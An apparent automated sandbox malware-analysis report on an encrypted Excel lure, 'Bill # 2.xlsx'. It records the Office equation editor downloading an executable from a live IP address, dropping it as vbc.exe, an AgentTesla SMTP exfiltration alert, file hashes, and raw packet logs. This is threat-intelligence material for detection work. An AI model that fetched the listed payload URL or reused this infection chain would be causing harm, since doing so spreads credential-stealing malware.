                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):326
                                              Entropy (8bit):3.123186963792904
                                              Encrypted:false
                                              SSDEEP:6:kK5CJwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:EmkPlE99SNxAhUegeT2
                                              MD5:AB6DA8AE6AA88FCEAE65300C795001E1
                                              SHA1:1CE227376FC49D31FB9F66A9C2FD0CF6121495F4
                                              SHA-256:DC99379FCEAA00E3BC2BF531C24C7A88ABDF449FDED25CA6423B1BEAD9658A91
                                              SHA-512:48E6343AEAC724E7182D4E869BCA918E33B6E00127146C33206FAFB91C6F80592F76287FA3FA99C456E58C6DC920ADE623449643E049F8C14B9985D5BCC1A27B
                                              Malicious:false
                                              Reputation:low
                                              Preview: p...... ..........g...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):619008
                                              Entropy (8bit):7.862193874993034
                                              Encrypted:false
                                              SSDEEP:12288:U/bH8hDt8CFefzXYQ1pY5ucIaIGnrqhz2VLgBpVy:2ritb6jYQXLGnrqIVkBpV
                                              MD5:C11D6124EE0522C7AB71D20CF3474DC0
                                              SHA1:C52A64B7189C762B907A9D727950F3D1364C68BA
                                              SHA-256:871A7F14C61157DBEA48D27F92BC64097E10EB44A9C8EF7543C435E275CA249C
                                              SHA-512:24B4D1776B4EC8610D1FE66A5AA9DC5A2886562E4805E0069E2177A477B272887CB7CD4616F4763814E6FFB6AA456A2B94301289B1FA75BF0585812D1F2A7C40
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:http://198.23.212.152/doc/tochi.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q._.................j.............. ........@.. ....................................@.................................|...O.......B............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...B............l..............@..@.reloc...............p..............@..B........................H.......x................q...w..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r)..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BF0B00E.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                              Category:dropped
                                              Size (bytes):48770
                                              Entropy (8bit):7.801842363879827
                                              Encrypted:false
                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6B13A00.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):1099960
                                              Entropy (8bit):2.015302275809141
                                              Encrypted:false
                                              SSDEEP:3072:7Xtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:hahIFdyiaT2qtXw
                                              MD5:EADDF03549BDB2AE98C0705F0D40A075
                                              SHA1:151E9F9681CEFFFFCDD6EBC06794FAA20A17D454
                                              SHA-256:B8B4B2780C4A577E6B123F1685E703804C2B8EE0891E3BAEBC5BEE8F23CA9862
                                              SHA-512:467B2C582E951EEC2A3E9F7064EC76BC97A6E6BF22103A71457309759315C8B9E554F42C86D6D654C5CE6B8B46B814C5AF2F06E246D11057C91B17D298F85632
                                              Malicious:false
                                              Reputation:low
                                              Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................$........N.X$....................N.X$....... ....y.R....$... ............z.R............o...............................X...%...7...................{ .@................C.a.l.i.b.r.................X.......P....2.R.................{.R............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE1BF201.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                              Category:dropped
                                              Size (bytes):48770
                                              Entropy (8bit):7.801842363879827
                                              Encrypted:false
                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                              C:\Users\user\AppData\Local\Temp\Cab4338.tmp
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58936
                                              Entropy (8bit):7.994797855729196
                                              Encrypted:true
                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                              C:\Users\user\AppData\Local\Temp\Tar4339.tmp
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):152533
                                              Entropy (8bit):6.31602258454967
                                              Encrypted:false
                                              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                              MD5:D0682A3C344DFC62FB18D5A539F81F61
                                              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                              Malicious:false
                                              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                              C:\Users\user\Desktop\~$Bill # 2.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):330
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                              Malicious:true
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\vbc.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):619008
                                              Entropy (8bit):7.862193874993034
                                              Encrypted:false
                                              SSDEEP:12288:U/bH8hDt8CFefzXYQ1pY5ucIaIGnrqhz2VLgBpVy:2ritb6jYQXLGnrqIVkBpV
                                              MD5:C11D6124EE0522C7AB71D20CF3474DC0
                                              SHA1:C52A64B7189C762B907A9D727950F3D1364C68BA
                                              SHA-256:871A7F14C61157DBEA48D27F92BC64097E10EB44A9C8EF7543C435E275CA249C
                                              SHA-512:24B4D1776B4EC8610D1FE66A5AA9DC5A2886562E4805E0069E2177A477B272887CB7CD4616F4763814E6FFB6AA456A2B94301289B1FA75BF0585812D1F2A7C40
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q._.................j.............. ........@.. ....................................@.................................|...O.......B............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...B............l..............@..@.reloc...............p..............@..B........................H.......x................q...w..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r)..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J

                                              Static File Info

                                              General

                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.961431743638658
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:Bill # 2.xlsx
                                              File size:201728
                                              MD5:483b35b49726fc59ba720ca3106a69f6
                                              SHA1:58b66c28ec98e732920179eb4e270e7b00517f08
                                              SHA256:982e68644911b369c8d440f2ca7e0380b5bb7b3400fe2f53d13f34f2fce5505b
                                              SHA512:9e93e0215b8cda65b0c659ef4791217cee803efd01883fc2cf8972650ad9d57e93bfa50b3fd4c66789bdd36046583edf4df180cec215183af373559ec87aeb36
                                              SSDEEP:3072:g8Za/8OonOp+yffMXsTflheKSxtJfqp/8ffgN9RFFPn2SByL/OpaN/Ne67wGv:JINoOp+y3OsTyK64SYNzXP/E/mINZT
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "Bill # 2.xlsx"

                                              Indicators

                                              Has Summary Info:False
                                              Application Name:unknown
                                              Encrypted Document:True
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:False

                                              Streams

                                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                              General
                                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                              File Type:data
                                              Stream Size:64
                                              Entropy:2.73637206947
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                              General
                                              Stream Path:\x6DataSpaces/DataSpaceMap
                                              File Type:data
                                              Stream Size:112
                                              Entropy:2.7597816111
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                              General
                                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                              File Type:data
                                              Stream Size:200
                                              Entropy:3.13335930328
                                              Base64 Encoded:False
                                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                              General
                                              Stream Path:\x6DataSpaces/Version
                                              File Type:data
                                              Stream Size:76
                                              Entropy:2.79079600998
                                              Base64 Encoded:False
                                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 194648
                                              General
                                              Stream Path:EncryptedPackage
                                              File Type:data
                                              Stream Size:194648
                                              Entropy:7.99819553665
                                              Base64 Encoded:True
                                              Data ASCII:P . . . . . . . < . . . H N . : . p . # . . $ A . . . . . . D , . . L . . < L . . H . . . . 3 . l < \\ 5 ! z L Y . R 5 . y . A R . . . . . 3 . Z . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m
                                              Data Raw:50 f8 02 00 00 00 00 00 3c 80 b7 8d 48 4e 1f 3a b6 70 da 23 fe 8a 24 41 f7 9b b2 80 cc be 44 2c 0e b4 4c ed b3 3c 4c ba f5 48 f8 a4 c8 1c 33 86 6c 3c 5c 35 21 7a 4c 59 f7 52 35 c3 79 e6 41 52 ba d1 f2 b2 d1 33 f1 5a 89 06 d6 f2 99 ec 92 6d 17 83 03 22 c2 a6 7f 06 89 06 d6 f2 99 ec 92 6d 17 83 03 22 c2 a6 7f 06 89 06 d6 f2 99 ec 92 6d 17 83 03 22 c2 a6 7f 06 89 06 d6 f2 99 ec 92 6d
                                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                              General
                                              Stream Path:EncryptionInfo
                                              File Type:data
                                              Stream Size:224
                                              Entropy:4.53373944191
                                              Base64 Encoded:False
                                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . 7 . . h . $ / . . . . k . . q k . . . . ~ a . R " l . . G . . . . . . . . . N t @ . . . . . . k . . . T . . . . y . . . = . . . . . . .
                                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              11/20/20-13:47:40.685847TCP1560WEB-MISC /doc/ access4916780192.168.2.22198.23.212.152
                                              11/20/20-13:47:40.685847TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22198.23.212.152
                                              11/20/20-13:49:22.192581TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49170587192.168.2.22208.91.198.143

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 20, 2020 13:47:37.549098015 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.553167105 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.684802055 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.685024977 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.685847044 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.805413961 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.805485964 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.805515051 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.805526972 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.805552006 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.805566072 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.805569887 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.805610895 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923609972 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923664093 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923722029 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923767090 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923787117 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923810959 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923837900 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923845053 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923850060 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923852921 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923892975 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923897028 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923930883 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923938036 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923974037 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042009115 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042073965 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042118073 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042155981 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042195082 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042232037 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042243958 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042272091 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042279959 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042310953 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042315006 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042319059 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042324066 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042327881 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042347908 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042362928 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042395115 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042399883 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042437077 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.042439938 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.042478085 CET8049167198.23.212.152192.168.2.22
